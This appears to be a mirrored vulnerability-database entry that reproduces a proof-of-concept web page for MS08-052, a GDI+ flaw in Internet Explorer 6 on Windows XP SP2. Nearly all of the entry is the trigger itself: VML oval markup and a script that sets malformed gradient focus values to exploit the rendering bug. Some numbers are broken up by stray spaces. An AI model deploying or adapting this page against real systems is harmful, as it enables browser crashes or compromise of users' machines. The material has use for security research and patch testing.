MS Internet Explorer GDI+ Proof of Concept (MS08-0 5 2)-vulnerability warning-the black bar safety net

2008-09-30T00:00:00
ID MYHACK58:62200820580
Type myhack58
Reporter 佚名
Modified 2008-09-30T00:00:00

Description

MS Internet Explorer GDI+ Proof of Concept (MS08-0 5 2)

<html> <head> <STYLE> ef\:* { behavior: url(#default#VML); } </STYLE> </head>

<body>

<pre>

MS08-0 5 2: GDI+ Vulnerability ------------------------------------------------ Operating System: XP SP2 Internet Explorer Version: 6.0.2900.2180 Gdiplus.dll Version: 5.1.3102.2180

Credit: John Smith, Evil Fingers

Link: <http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt>

</pre>

<XML:NAMESPACE ns="urn:schemas-microsoft-com:vml" prefix="ef">

<ef:oval style='left: 5 0 0; top: 5 0 0; width: 500px; height: 500px;' fill= 'true' id='ef_oval'> <ef:fill type="gradientCenter";></ef:fill> </ef:oval>

<script> var focus_size = "-5, -4"; var focus_pos = ".1, .1"; var ef_oval = document. getElementById('ef_oval');

ef_oval. fill. focussize = focus_size; ef_oval. fill. focusposition = focus_pos; </script> </body> </html>